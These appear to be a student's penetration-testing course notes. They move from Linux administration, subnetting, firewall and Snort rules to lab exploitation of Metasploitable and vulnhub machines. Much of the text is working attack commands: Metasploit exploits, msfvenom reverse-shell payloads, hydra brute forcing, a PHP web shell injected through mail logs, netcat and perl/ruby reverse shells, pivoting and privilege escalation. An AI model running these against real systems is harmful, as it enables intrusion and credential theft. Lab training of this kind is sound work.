Scribd
Upload
31 views61 pages

24 10 2024 - CSP

The document provides a comprehensive list of software downloads, including VirtualBox, Microsoft Visual C++, Kali Linux, and various penetration testing tools. It also includes commands for Linux system administration, user and group management, file permissions, and network configuration. Additionally, it covers installation and usage of security tools like Snort and Nessus, along with subnetting concepts and firewall rules.

Uploaded by

AYAN BHOWAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
31 views61 pages

24 10 2024 - CSP

The document provides a comprehensive list of software downloads, including VirtualBox, Microsoft Visual C++, Kali Linux, and various penetration testing tools. It also includes commands for Linux system administration, user and group management, file permissions, and network configuration. Additionally, it covers installation and usage of security tools like Snort and Nessus, along with subnetting concepts and firewall rules.

Uploaded by

AYAN BHOWAL
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 61

Virtual box download

https://www.virtualbox.org/wiki/Downloads

Virtualboxextenstionpacknc-
https://www.virtualbox.org/wiki/Downloads

Microsoft visual c++


https://learn.microsoft.com/en-us/cpp/windows/latest-supported-vc-redist?view=msvc-170
https://aka.ms/vs/17/release/vc_redist.x64.exe

Kali linux Download


https://www.kali.org/get-kali/#kali-platforms

https://cdimage.kali.org/kali-2024.2/kali-linux-2024.2-installer-amd64.iso

Metsplotiable2:-
https://sourceforge.net/projects/metasploitable/files/latest/download

Windows7:-
https://drive.google.com/file/d/13vNXD2TatqYtYAxDLDP5HvOY8gtra-ny/view?usp=drive_link

Windows server 2012 R2 iso:-


https://drive.google.com/file/d/1vbDtbormmMjbF6cM1quZhJJ1sZmtvnuc/view?usp=drive_link

Basicpentestingctf:-
https://drive.google.com/file/d/1wkfI9cpyjouj6ox_88EqF6tKMtTHIYC1/view

Tryhackme:-
https://drive.google.com/file/d/1ZGIJW0nH5hUdTjdXsWpqruyTplBo6oR5/view?usp=sharing

HSBox1:-
https://drive.google.com/file/d/1i40AESTy0fMdoi6_v92M4OJUgs6o7YMx/view?usp=sharing

KBVuln:-
https://drive.google.com/drive/folders/1o8eP-vh7tHa82R1RDc-baKDx9pxvFqOx

Wintermute1:-
https://drive.google.com/open?id=1bHgdx0iI24jv7MDzKcrIPtd9rVFaVokR

Anydesk Download
https://anydesk.com/en
Alternative Remote access tools

Teamviewer:-
https://download.teamviewer.com/download/TeamViewerQS_x64.exe

Rustdesk:-
https://github.com/rustdesk/rustdesk/releases/download/1.2.3-1/rustdesk-1.2.3-1-x86_64.exe

kiran.m@cartelsoftware.com

sudo passwd root

pwd
ls
cd
mkdir

create directory new1 in /home


new1 create subdir new2

create directory /movies/2024/english/

create directory 'kali linux' in /home

create directory India in /tmp

create directory 'test123' in the user home directory

/root
/home

vikram:x:1001:1001::/home/vikram:/bin/sh
username:password:uid:gid:full name:home dir:login access

useradd sai
cat /etc/passwd
passwd sai

su sai
$whoami

groupadd hr
cat /etc/group

rm -rf test123

- rw- r-- r--


file type owner group others

r=4
w=2
x=1

r-- = 4
r-x = 5
rw- =4+2=6
rwx =4+2+1=7
--x =1

rwxr--r-x=745
r--rw-rwx=467

r-xr--rwx=547
rwxrw-r--=764

r=4,w=2,x=1
create 3 dir with name
dir1 = r--rwx--x = 471
dir2 = rwx---rw- = 706
dir3 = rwx-wx-wx = 733

ugo
u=owner
g=group
o=other

+ --> add
- --> remove
= --> exact
rwx

create 3 dir
winner = rwxr-xrw-
winner2 = r--rw-rwx
dinner = r---wxr-x

chown <username> <filename>


chgrp <groupname> <filename>

create user account worldcup and group account security

create dir india

apt update
apt list
apt search vlc
apt install vlc
apt remove vlc

apt list | grep installed


apt list | grep vlc

apt purge vlc

apt search synaptic


apt install synaptic

apt upgrade
apt install --only-upgrade vlc

dpkg -i <package name>


dpkg -r <package name>
dpkg -p <package name>

fdisk -l

fdisk /dev/sdb

Command (m for help): m


Command (m for help): n
Partition type
p primary (0 primary, 0 extended, 4 free)
e extended (container for logical partitions)
Select (default p): p
Partition number (1-4, default 1): 1
First sector (2048-12582911, default 2048):#NOTE: NO VALUE#
Last sector, +/-sectors or +/-size{K,M,G,T,P} (2048-12582911, default 12582911): +500M
Created a new partition 1 of type 'Linux' and of size 500 MiB.

Command (m for help): p


Disk /dev/sdb: 6 GiB, 6442450944 bytes, 12582912 sectors
Disk model: VBOX HARDDISK
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0xf48c1c52

Device Boot Start End Sectors Size Id Type


/dev/sdb1 2048 1026047 1024000 500M 83 Linux
q=quit,w=write or save,d=delete
fdisk -l
gdisk /dev/sdc

Command (? for help): n


Partition number (1-128, default 1): 1
First sector (34-8388574, default = 2048) or {+-}size{KMGTP}: #NOTE,NO VALUE
Last sector (2048-8388574, default = 8386559) or {+-}size{KMGTP}: +50M
Current type is 8300 (Linux filesystem)
Hex code or GUID (L to show codes, Enter = 8300): #NOTE, NO VALUE#
Changed type of partition to 'Linux filesystem'
p=print,q=quit,w=save

mkfs.ext4 /dev/sdc1

ps aux

msfconsole

ps aux | grep msfconsole

kill <process id>


kill -9 <process id>

cd /etc/init.d/

service <service name> status|start|stop|restart|reload

service apache2 start


ip a
note:eth0:<ip address>
open browser: enter ip address

service apache2 stop


in browser private windows: enter ip address

ls -lh
bzip2 <filename>
bunzip2 <filename.bz2>

gzip <filename>
gunzip <filename.gz>

compress <filename>
uncompress <filename.Z>

tar -cvf grp.tar 22940.txt 'Booklet on An Introduction to Cyber Crime.pdf.bz2' Untitled.jpeg


tar -cvf file.tar file1 file2 file3 file4

tar -tvf file.tar (display files that grouped)

tar -xvf filename

https://parrotsec.org/download/

1)initiate nginx service


2)Create password for root account
3)Install any application using package manager (vlc or vsftpd)
4)Create 3 files with name n1,n2,n3 and compress the file using bzip2
5)Add virtual hard drive (4GB) to parrot linux and create GPT partition
6)Create a group sysmgrs .Create users test1, test2 & test3. Users test1 & test2 should be a
part of the sysmgrs group.Password of all users are "linux123"
7)Create a user jean. User id of this user should be 2556.
8)Secure /netdir such that only group sysmgrs can access it. Group owner should be sysmgrs.
9)configure permission for the file new22.txt. where owner should have rw, group should have r
and others should have rwx.

touch new.txt

alt+a to select
alt +6 to copy
ctrl+v to paste
ctrl+k to cut
ctrl+w to search
ctrl+r to replace
ctrl+x to exit

pluma new.txt (GUI, Default in parrot)


mousepad new.txt (GUI,Default in kali)

to install any text editor


apt install <name of text editor>

find / -name new.txt


find / -iname new.txt
find / -type d -name Desktop
find / -type f -name new.txt
find / -perm 777
find / -perm -u=rw
find / -perm -g=rwx -type d
find / -name *.pdf
find /home -name *.jpeg
find /var -name *.log
find / -name cyber*.pdf
find / -name Desk*
find / -iname Desk*

lscpu
lsmem
lsblk
lspci
apt install hwinfo
hwinfo

https://fedoraproject.org/workstation/download

yum update
apt install synaptic

yum update
yum list
yum search mousepad
yum install mousepad
yum remove vlc
yum list | grep installed
yum list | grep vlc

yum purge vlc

yum search synyumic


yum install synyumic

yum upgrade
yum install --only-upgrade vlc

rpm -i <package name>


rpm -e <package name>

hostname
hostnamectl
uname
uname -a
whoami
id
df -h
history
man <command name> #help

CLASS A N.H.H.H/8 255.0.0.0


CLASS B N.N.H.H/16 255.255.0.0
CLASS C N.N.N.H/24 255.255.255.0

CLASS C
NETWORK BITS:- 24 HOST BITS:- 8
SUBNET MASK:- 255.255.255.0/24

REQ=50

NO OF HOST BITS REQ(h):- 2^K-2>=REQ


k=0,1,2,3,4,5,6,7,8,9,10...

2^0-2>=50
-1>=50

2^1-2>=50
0>=50
2^2-2>=50
2>=50

2^6-2>=50
64-2>=50
62>=50
k=h
h=6

NO OF NETWORK BITS REQ (n)= TOTAL NO OF HOST BITS - REQ HOST BITS
n=H-h
n=8-6
n=2

CUST SUBNET MASK=DEFAULT SUBNET MASK+n


=24+2
=26=11111111.1111111.11111111.11000000
=255.255.255.192

NO OF HOST PER NETWORK=2^h


=2^6
=64
=
TOTAL NO OF NETWORK = 2^n
= 2^2
=4

200.10.20.25
200.10.20.0
200.10.20.1
200.10.20.2
200.10.20.62
200.10.20.63

200.10.20.64

200.10.20.127
200.10.20.128

200.10.20.191
200.10.20.192

200.10.20.255

255.255.255.192

REQ=10
CLASS C
N=24 H=8 N.N.N.H/24 255.255.255.0

h=2^k-2>=REQ

2^0-2>=10
-1>=10

2^1-2>=10
0>=10

2^2-2>=10
2>=10

2^3-2>=10
6>=10

2^4-2>=10
14>=10

h=4

n=H-h
n=8-4
n=4

SUBNET MASK=24+n
=24+4
=28
=255.255.255.240

NO OF HOST PER NETWORK=2^h


=2^4
=16

TOTAL NO OF NETWORK = 2^n


= 2^4
= 16

195.50.100.200

195.50.100.0

195.50.100.15
195.50.100.16

195.50.100.31
195.50.100.32

195.50.100.47

192.50.100.255

REQ=5
CLASS A
N=8 H=24 N.H.H.H/8 255.0.0.0

h=2^k-2>=REQ

2^2-2>=5
2>=5
2^3-2>=5
6>=5
h=3

n=H-h
=24-3
n=21

SUBNET=8+n
8+21=29
11111111.111111111.11111111.11111000
255.255.255.248

NO OF HOST PER NETWORK=2^h


=2^3
=8

TOTAL NO OF NETWORK = 2^n


=2^21
=2097152

100.20.35.55

100.0.0.0

100.0.0.7

100.0.0.8

100.0.0.15

100.255.255.255

https://www.calculator.net/ip-subnet-calculator.html

iptables -L
iptables -A OUTPUT -p tcp --dport 80 -j DROP
iptables -L
iptables -D OUTPUT -p tcp --dport 80 -j DROP
iptables -L

iptables -L
iptables -A OUTPUT -p tcp -s 192.168.1.96 -d 44.228.249.3 --dport 80 -j DROP
iptables -L
iptables -D OUTPUT -p tcp -s 192.168.1.96 -d 44.228.249.3 --dport 80 -j DROP
iptables -L

service apache2 start

apt update
apt install vsftpd
service vsftpd start

window 7
open powershell
ftp <kali ip>
ftp 192.168.1.66

reboot
apt update
apt install iptables-persistent
iptables -L
cat /etc/iptables/rules.v4
iptables -A INPUT -p tcp -s 192.168.1.18 -d 192.168.1.66 --dport 80 -j DROP
iptables-save > /etc/iptables/rules.v4
cat /etc/iptables/rules.v4
update-rc.d netfilter-persistent enable
reboot
iptables -L

apt update
apt install snort

touch new.rules
mousepad new.rules
alert icmp 192.168.1.18 any -> 192.168.1.66 any (msg:"ICMP FROM WINDOWS 7
OS";sid:1000000001)
alert tcp 192.168.1.66 any -> 44.228.249.3 80 (msg:"ACCESSING TESTPHP
WEBSITE";sid:1000000002)
ctrl+s

snort -c /etc/snort/snort.lua -R /root/new.rules -i eth0 -A alert_fast -s 65535 -k none

<action> <protocol type> <src ip> <src port> <direction> <dst ip> <dst port> (msg:"YOUR
WISH";sid:100000000001)

OLD VERSION:- snort -q -A console -c /etc/snort/snort.conf -i eth0

In Kali
nessus download
https://www.tenable.com/downloads/nessus?loginAttempted=true
Linux-Ubuntu-amd64

cd /root/Downloads
dpkg -i Nessus-10.7.5-ubuntu1604_amd64.deb
service nessusd start

In browser
https://127.0.0.1:8834

test123@mailinator.com

Calculate CVSS SCORE


attack can be done from anywhere
no end user interation req
No firewall or security devices
no attack requirement
MFA req

Attacker can access data comp,no modification of data,service not avaiable to anyone

Subsequent System Impact Metrics

no impact on another system

service nessusd start


https://127.0.0.1:8834

ip r

fping -h
fping -g 192.168.1.0/24
fping -g 192.168.1.0/24 -a -q

arp-scan 192.168.1.0/24

netdiscover -i eth0

cd Downloads
ls
dpkg -i ipscan_3.9.1_amd64.deb
ipscan

nmap -h
nmap -sn 192.168.1.1
nmap -sn 192.168.1.1 192.168.1.55
nmap -sn 192.168.1.1 192.168.1.55 192.168.1.2
nmap -sn 8.8.8.8
nmap -sn amazon.in
nmap -sn amazon.in 8.8.8.8 192.168.1.1
nmap -sn 192.168.1.0/24
nmap -sn 192.168.1.50-111

nmap -sn 192.168.1.0/24 --exclude 192.168.1.1


nmap -sn 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.5
nmap -sn 192.168.1.0/24 --exclude 192.168.1.1,192.168.1.5,192.168.1.100,192.168.1.200

ping -6 facebook.com
nmap -6 -sn google.com
nmap -6 -sn 2a03:2880:f137:182:face:b00c:0:25de

mousepad ip.txt
nmap -sn -iL ip.txt
cat ip.txt

TCP CONNECT SCAN- FULL SCAN


-sT
nmap -sT scanme.nmap.org
scanme.nmap.org
altoromutual.com
vulnweb.com
ip.addr==192.168.1.17 && tcp.port==80

TCP HALF SCAN


-sS
nmap -sS scanme.nmap.org
nmap -sS 192.168.1.17
2-WAY HS
SYN --> SYN+ACK OPEN
SYN --> RST+ACK CLOSE

FIN SCAN
-sF

nmap -sF 192.168.1.17

OPEN - NO RESPONSE
CLOSE - RESPONSE

XMAS SCAN
-sX
URG,PUH,FIN

OPEN - NO RESPONSE
CLOSE - RESPONSE

-v
-vv (#print more info)

Metasploitable download
https://sourceforge.net/projects/metasploitable/files/latest/download

HSBOX1 download
https://drive.google.com/file/d/1i40AESTy0fMdoi6_v92M4OJUgs6o7YMx/view?usp=drive_link

nmap -sT 192.168.1.30 -dd (TOP 1000 ports)


nmap -sT 192.168.1.30 -p- (65535)
nmap -sT 192.168.1.30 -p 80
nmap -sT 192.168.1.30 -p 25,110,143
nmap -sT 192.168.1.30 -p 1-100
nmap -sT 192.168.1.30 -p 1-520,6667
nmap -sT 192.168.1.30 -p mysql

nmap -sU 192.168.1.30 -p 53,67,161

nmap -sT -sU -p T:21,25,80,U:53,514 192.168.1.30

Version detection scan


-sV
nmap -sT 192.168.1.30 -sV

updatedb
locate *.nse

locate *.nse | grep ftp

nmap --script-help /usr/share/nmap/scripts/ftp-anon.nse


nmap --script /usr/share/nmap/scripts/ftp-anon.nse -p 21 -sV 192.168.1.30

locate *.nse | grep ftp


nmap --script-help /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse
nmap --script /usr/share/nmap/scripts/ftp-vsftpd-backdoor.nse -sV -p 21 192.168.1.30

nmap --script ftp-* -sV -p 21 192.168.1.30

locate *.nse | grep smb


nmap --script-help /usr/share/nmap/scripts/smb-os-discovery.nse
nmap --script /usr/share/nmap/scripts/smb-os-discovery.nse -p 445 -sV 192.168.1.17
locate *.nse | grep smb

nmap --script-help /usr/share/nmap/scripts/smb-enum-shares.nse


nmap --script /usr/share/nmap/scripts/smb-enum-shares.nse --script-args
smbusername=forensic,smbpassword=admin -p 445 -sV 192.168.1.17

locate *.nse | grep smb


nmap --script-help /usr/share/nmap/scripts/smb-vuln-ms17-010.nse
nmap --script /usr/share/nmap/scripts/smb-vuln-ms17-010.nse -p 445 -sV 192.168.1.17

nmap --script smb-* -p 445 -sV 192.168.1.17

https://nmap.org/nsedoc/categories/

auth
broadcast
brute
default
discovery
dos
exploit
external
fuzzer
intrusive
malware
safe
version
vuln

nmap --script auth -sV 192.168.1.30


nmap --script vuln -sV 192.168.1.30

nmap -sT 192.168.1.30 -O

nmap --script-help default

nmap --script default 192.168.1.30 -sV

nmap -sC 192.168.1.30 -sV

nmap -sC -sV -O 192.168.1.30

nmap -A 192.168.1.30
-A=-sV -sC -O

-n disable dns resolution


-Pn skip host discovery
-T0 to -T5 Time temp
-T0 --> slow
-T5 --> fast
-T3 --> default

https://weakpass.com/

https://github.com/danielmiessler/SecLists

cd /usr/share/wordlists

touch username.txt
touch password.txt
mousepad username.txt
mousepad password.txt

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V

hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V -t 32


hydra -L /root/username.txt -P /root/password.txt 192.168.1.30 ftp -s 21 -V -t 4

hydra -l msfadmin -P /root/password.txt ftp://192.168.1.30

hydra -L /root/username.txt -p msfadmin ftp://192.168.1.30

hydra -L /root/username.txt -P /root/password.txt 192.168.1.201 smb -s 445 -V


hydra -L /root/username.txt -P /root/password.txt smb://192.168.1.201

HSBOX1
nmap,hydra,crunch,cewl

nmap 192.168.1.17
nmap 192.168.1.17 -p-
nmap 192.168.1.17 -p 21,1515,3535 -sV
locate *.nse | grep ftp
nmap --script /usr/share/nmap/scripts/ftp-anon.nse -sV -p 21 192.168.1.17
ftp 192.168.1.17
ftp>ls
ftp>get note.txt
ftp>quit
cat note.txt
cewl http://192.168.1.17:1515 -w wordlist1.txt
cat wordlist1.txt
hydra -l jack -P /root/wordlist1.txt 192.168.1.17 ssh -s 3535 -V
ssh jack@192.168.1.17

password Cyberspace

crunch 4 4 ac15 -o wordlist2.txt


cat wordlist2.txt
hydra -l goblin -P /root/wordlist2.txt 192.168.1.17 ssh -s 3535
ssh goblin@192.168.1.17 -p 3535

password ca51

find / -name final.sh


./final.sh /home/goblin

info gart
theHarvester -d certifiedhacker.com -l 1000 -b hackertarget

apt update
apt install subfinder
subfinder -d certifiedhacker.com

dig sftp.certifiedhacker.com

In browser:- dome github


git clone https://github.com/v4d1/Dome.git
ls
cd Dome
ls
pip install -r requirements.txt\n
python dome.py -m passive -d certifiedhacker.com
python dome.py -m active -d certifiedhacker.com

/usr/share/metasploit-framework/modules/

msfconsole
msf6>search ftp
msf6>search ftp type:auxiliary
msf6>info auxiliary/scanner/ftp/anonymous
msf6>use auxiliary/scanner/ftp/anonymous
msf6 auxiliary(scanner/ftp/anonymous) >show options
msf6 auxiliary(scanner/ftp/anonymous) >set RHOSTS 192.168.0.148
msf6 auxiliary(scanner/ftp/anonymous) >show options
msf6 auxiliary(scanner/ftp/anonymous) >run

search ftp type:auxiliary


info auxiliary/scanner/ftp/ftp_version
use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.0.148
run

search ftp type:auxiliary


info auxiliary/scanner/ftp/ftp_login
use auxiliary/scanner/ftp/ftp_login
show options
set RHOSTS 192.168.0.148
set PASS_FILE /root/password.txt
set USER_FILE /root/username.txt
show options
run

search ssh type:auxiliary


use auxiliary/scanner/ssh/ssh_version
show options
set RHOSTS 192.168.0.148
show options
run

search ssh type:auxiliary


info auxiliary/scanner/ssh/ssh_login
use auxiliary/scanner/ssh/ssh_login
show options
show missing
set RHOSTS 192.168.0.148
set USER_FILE /root/username.txt
set PASS_FILE /root/password.txt
run
search telnet type:auxiliary
use auxiliary/scanner/telnet/telnet_version
show options
set RHOSTS 192.168.0.148
show options
run

msfconsole
search vsftp type:exploit
info exploit/unix/ftp/vsftpd_234_backdoor
use exploit/unix/ftp/vsftpd_234_backdoor
show payloads
info payload/cmd/unix/interact
show options
set RHOSTS 192.168.0.148
show options
run
sessions
sessions -i 1
sessions

ctrl+c abort
ctrl+z background

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...


:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys
%ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new
IO::Socket::INET(LocalPort,4567,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c
,r);while(<>){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered

:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...


:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;ruby -rsocket -e 'exit if
fork;c=TCPSocket.new("192.168.0.139","4568");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print
io.read}end'
:irc.Metasploitable.LAN 451 AB;ruby :You have not registered
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP
address instead
AB;sh -c '(sleep 4444|telnet 192.168.0.139 4569|while : ; do sh && break; done 2>&1|telnet
192.168.0.139 4569 >/dev/null 2>&1 &)'
:irc.Metasploitable.LAN 451 AB;sh :You have not registered

search unrealirc
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads
set payload payload/cmd/unix/bind_perl
show options
set RHOST 192.168.0.148
set LPORT 4567
show options
exploit

show payloads
set payload payload/cmd/unix/reverse_ruby
show options
set LHOST 192.168.0.139
set LPORT 4568
show options
exploit
sessions

show payloads
use payload/cmd/unix/reverse
show options
search unrealirc
use exploit/unix/irc/unreal_ircd_3281_backdoor
show payloads
set payload payload/cmd/unix/reverse
show options
set LPORT 4569
exploit
show payloads

Johnwick link to download


https://mega.nz/file/ebA3BbqZ#iCcrtFU4_L198-uhNMZI0JH4Fbf5kMV6YKW6nb4P2W8

Basic pentest link https://download.vulnhub.com/basicpentesting/basic_pentesting_1.ova


nmap 192.168.0.159
nmap 192.168.0.159 -p 21,22,80 -A
locate *.nse | grep ftp
nmap --script-help /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse
nmap --script /usr/share/nmap/scripts/ftp-proftpd-backdoor.nse 192.168.0.159 -sV

msfconsole
search proft
search proft type:exploit
info exploit/unix/ftp/proftpd_133c_backdoor
use exploit/unix/ftp/proftpd_133c_backdoor
show payloads
set payload payload/cmd/unix/reverse
show options
set RHOSTS 192.168.0.159
ip a
set LHOST 192.168.0.139
show options
show missing
set LPORT 4569
exploit

ip r
nmap -sn 192.168.0.0/24

download james.jpg and extract metadata


exiftool james.jpg

hydra -l jamesbond -P /usr/share/wordlists/wifite.txt 192.168.0.177 ssh -s 22

ssh jamesbond@192.168.0.177
password: butterfly

https://gtfobins.github.io/

sudo -l

sudo ftp
!/bin/sh

nmap 192.168.0.107
nmap 192.168.0.107 -A
nmap --script smb-* -p 445 -sV 192.168.0.107
searchsploit ms17-010
msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.107
set LHOST 192.168.0.159
set LPORT 4567
show options
exploit

meterpreter>sysinfo

KALI IP: 192.168.0.156

TARGET 1: 192.168.0.108
192.168.100.102

NOTE: sudo dhclient

TARGET 2: 192.168.100.117

msfconsole
search ssh type:auxiliary
use auxiliary/scanner/ssh/ssh_login
show options
set RHOSTS 192.168.0.108(target 1 BA)
set USERNAME msfadmin
set PASSWORD msfadmin
exploit

sessions

sessions -u 1
sessions

search autoroute
info post/multi/manage/autoroute
use post/multi/manage/autoroute
show options
sessions
set SESSION 2
show options
run
route

search ping type:post


info post/multi/gather/ping_sweep
use post/multi/gather/ping_sweep
show options
set RHOSTS 192.168.100.0/24
set SESSION 2
run

search scan type:auxiliary


search portscan type:auxiliary
use auxiliary/scanner/portscan/tcp
show options
set PORTS 1-100
set RHOSTS 192.168.100.117(TARGET 2)
run

search ftp type:auxiliary


use auxiliary/scanner/ftp/ftp_version
show options
set RHOSTS 192.168.100.117 (TARGET 2)
run

search vsftp type:auxiliary


search vsftp
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.100.117(target 2)
exploit

msfconsole
search hta_server
use exploit/windows/misc/hta_server
show payloads
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set target 1
show options
exploit -j
jobs
sessions
sessions -i 1

msfconsole
search hta_server
use exploit/windows/misc/hta_server
show payloads
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set target 1
show options
exploit -j

jobs
sessions
sessions -i 1

meterpreter
create a dir in c:\ name demo123
hashdump

msfconsole
search hta_server
use exploit/windows/misc/hta_server
set payload windows/x64/meterpreter/reverse_tcp
show options
set LPORT 4567
show targets
set TARGET 1
show options
exploit -j

sessions

meterpreter>background

search bypassuac
use exploit/windows/local/bypassuac
set PAYLOAD windows/x64/meterpreter/reverse_tcp
show options
sessions
set SESSION 1
set LPORT 4569
show targets
set target 1
exploit

sessions

sessions -i 2
meterpreter > shell
Process 744 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.

C:\Windows\System32>netsh advfirewall set allprofiles state off

search persistence
use exploit/windows/local/persistence
set payload payload/windows/meterpreter/reverse_tcp
show options
set session 2
set LPORT 4499
exploit -j

use multi/handler
set payload windows/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.110
set LPORT 4499
exploit -j

msfconsole
search web_delivery
use exploit/multi/script/web_delivery
show targets
set target 2
show payloads
set payload payload/windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.110
set LPORT 4569
show options
exploit -j

open mousepad
copy and paste the command and save thr file with .bat extension

ufile.io
file uploader without reg

download in windows

msfvenom
msfvenom --list platforms
msfvenom --list payloads
msfvenom --list payloads | grep android
msfvenom --list payloads | grep windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4569
--platform windows -f exe -o /root/Desktop/winp.exe
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4569 -f exe
-o /root/Desktop/winp1.exe

msfvenom --list payloads


msfvenom --list payloads | grep windows
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.122 LPORT=4566 -f exe
-o /root/Desktop/ms.exe

msfconsole
use multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options
set LHOST 192.168.0.122
set LPORT 4566
exploit -j
sessions
sessions -i 1

https://ufile.io
msfvenom -p linux/x86/shell/reverse_tcp LHOST=192.168.0.122 LPORT=5669 -f elf -o
/root/Desktop/linuxms.elf

msfconsole
use multi/handler
set payload linux/x86/shell/reverse_tcp
set LHOST 192.168.0.122
set LPORT 5669
exploit -j
sessions
sessions -i 1

NEW TERMINAL
cd Desktop
python -m http.server 8999

IN TARGET
http://192.168.0.122:8999/linuxms.elf
chmod +x linuxms.elf
./linuxms.elf

KALI : BA- 192.168.0.122

WINDOWS 7: BA,HA - 192.168.0.175 - 192.168.115.7

WINDOWS CLONE: HA - 192.168.115.8

KALI : BA- 192.168.0.122

WINDOWS 7: BA,HA - 192.168.0.175 - 192.168.115.7

WINDOWS CLONE: HA - 192.168.115.8

msfconsole

search smb type:exploit


use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/reverse_tcp
show options
set RHOST 192.168.0.175
set SMBUSER forensic
set SMBPASS admin
set LPORT 4567
show options
exploit

meterpreter >background

sessions

search autoroute
use post/multi/manage/autoroute
show options
sessions
set session 1
run

route

search socks
info auxiliary/server/socks_proxy
use auxiliary/server/socks_proxy
show options
sessions
sessions -i 1
run

NEW TERMINAL

mousepad /etc/proxychains4.conf

REMOVE # in dynamic_chains
add # in strict_chain
END OF THE LINE
socks5 127.0.0.1 1080
ctrl+s

proxychains nmap -n -Pn -sT -p 139,445 192.168.115.8


proxychains msfconsole
search smb type:exploit
use exploit/windows/smb/psexec
set payload windows/x64/meterpreter/bind_tcp
show options
set RHOST 192.168.115.8
set SMBUSER forensic
set SMBPASS admin
set LPORT 5599
show options
exploit

KALI : BA 192.168.0.122
WINDOWS7: BA,HA 192.168.0.175, 192.168.115.7
METASPLOIABLE2: HA 192.168.115.11

portfwd add -l 10080 -p 80 -r 192.168.115.8

KALI IP:- BA

STRAYLIGHT: BA,HA

NEUROMANCER: HA

ip r
arp-scan 192.168.0.0/24
nmap -p 25,3000 --open 192.168.0.0/24

nmap 192.168.0.179 -A

http://192.168.0.179/turing-bolo

http://192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail

TERMINAL
telnet 192.168.0.179 25

mail from:new4
250 2.1.0 Ok

rcpt to:root
250 2.1.5 Ok

data
354 End data with <CR><LF>.<CR><LF>
<?php system($_GET["cmd"]);?>
.
250 2.0.0 Ok: queued as E669055A6

https://addons.mozilla.org/en-US/firefox/addon/hacktools/
http://192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail&cmd=ls
RIGHT CLICK --> view source

192.168.0.179/turing-bolo/bolo.php?bolo=/var/log/mail&cmd=nc -e /bin/sh 192.168.0.175 5566

kali terminal
nc -nlvp 5566

python -c 'import pty; pty.spawn("/bin/bash")'

telnet 192.168.0.179 25

mail from:new4
250 2.1.0 Ok

rcpt to:root
250 2.1.5 Ok

subject:"<?php system($_GET["cmd"]);?>"

IN KALI
searchsploit screen 4.5.0
searchsploit -m linux/local/41154.sh
python -m http.server 8456

find / -perm -u=s


wget http://192.168.0.175:8456/41154.sh
chmod +x 41154.sh
./41154.sh

ifconfig

for i in {1..200}; do ping -c 1 192.168.115.$i; done

nc -nvz 192.168.115.13 1-40000

socat TCP-LISTEN:12001,fork TCP:192.168.115.13:8009 &

socat TCP-LISTEN:12002,fork TCP:192.168.115.13:8080 &

socat TCP-LISTEN:12003,fork TCP:192.168.115.13:34483 &


searchsploit struts 2

searchsploit -m linux/webapps/41570.py

python2 41570.py
python2 41570.py http://192.168.0.179:12001/struts2_2.3.15.1-showcase/showcase.action "ls
-l"

kingsmen\Administrator

Kali:- 192.168.0.175
server:- 192.168.0.200
client:- 192.168.0.201

msfconsole
search CVE-2017-0143
use exploit/windows/smb/ms17_010_eternalblue
show options
show missing
set RHOSTS 192.168.0.201
show options
set LPoRT 3344
show targets
exploit

search domain
search domain type:post
info post/windows/gather/enum_domain
use post/windows/gather/enum_domain
show options
sessions
set SESSION 1
run

search domain type:post


info post/windows/gather/enum_ad_computers
use post/windows/gather/enum_ad_computers
show options
set SESSION 1
run
search domain type:post
info post/windows/gather/enum_ad_users
use post/windows/gather/enum_ad_users
show options
set SESSION 1
run

search domain type:post


info post/windows/manage/add_user
use post/windows/manage/add_user
show options
set SESSION 1
set USERNAME sai
run

msfconsole
search ms17-010
use exploit/windows/smb/ms17_010_eternalblue
show options
set RHOSTS 192.168.0.201
set LPORT 5522
show options
exploit

meterpreter > sysinfo


meterpreter > load incognito
meterpreter > list_tokens -u
meterpreter > impersonate_token KINGSMEN\\Administrator
meterpreter > background

search token type:exploit


